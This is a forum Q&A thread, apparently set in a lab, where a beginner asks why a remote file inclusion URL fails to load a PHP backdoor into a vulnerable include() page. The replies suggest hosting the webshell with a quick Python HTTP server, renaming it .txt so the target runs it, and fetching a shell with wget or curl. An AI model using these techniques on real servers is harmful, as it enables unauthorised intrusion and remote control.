RFI not working properly, how to open a shell?

Question

When i am trying to backdoor a web page given to me to find a specific file, upon requesting a shell i am given the following warnings on the page, and no other information is given. Should a shell pop up? I am kind of new to RFI and this is my first time working through it.

The link i used is:

http://10.102.x.x/description.php?page=http://10.102.x.xx//usr/share/webshells/php/php-backdoor.php

The display when searching it was:

Warning: include(http://10.102.x.xx//usr/share/webshells/php/php-backdoor.php): failed to open stream: Connection refused in /var/www/html/description.php on line 5

Warning: include(): Failed opening 'http://10.102.x.xx//usr/share/webshells/php/php-backdoor.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/html/description.php on line 5

description.php looks like this:

<?php
$image_name = $_GET['page'];

// Get the description from another file
include($image_name);

?>

What is the issue? I am sort of stuck.

Should i create a HTTP server to push my shell instead? I've read something about this but not sure what that entails

Even a link to an article is appreciated

As I said in my now-deleted answer, I _think_ you should be giving a local path rather than a web path e.g. `http://10.102.x.x/description.php?page=/usr/share/webshells/php/php-backdoor.php`. However I don't really know what you should be doing beyond that, so I deleted the answer. — DavidW, Nov 14 '19 at 19:26
I think your error is how you access the backdoor file because the URL seems wrong unless your webserver is running at /, so if you have the backdor file at ``/usr/share/webshells/php/php-backdoor.php`` the easy way is to cd into that directly and ``python -m SimpleHTTPserver 80`` and use ``http://IP/php-backdoor.php``. Also a common method is use .txt instead of php as file extension for the RFI to be executed by php — Eduardo Gonzalez, Nov 19 '19 at 16:01

score 0 · Answer 1 · answered Nov 12 '19 at 18:55

0

I don't know how the php script looks like where you try go include the remote page, but it has to be something like:

$incfile = $_REQUEST["file"]; include($incfile.".php");

answered Nov 12 '19 at 18:55

BaiHui

9
1

what do you mean? – ismaeel ali Nov 12 '19 at 19:07
Can you update your question with the code from description.php so we can see more and help you ? – BaiHui Nov 12 '19 at 19:08
i did it, hope that makes sense – ismaeel ali Nov 12 '19 at 20:08
which file do i add that to? and if its a host file how do i edit it? – ismaeel ali Nov 14 '19 at 18:15
For me the best way to backdoor a php file is to create a $_GET that will execute the command given, then just use wget or curl to get the shell from other website and convert it to .php file – BaiHui Nov 14 '19 at 18:17

RFI not working properly, how to open a shell?

1 Answers1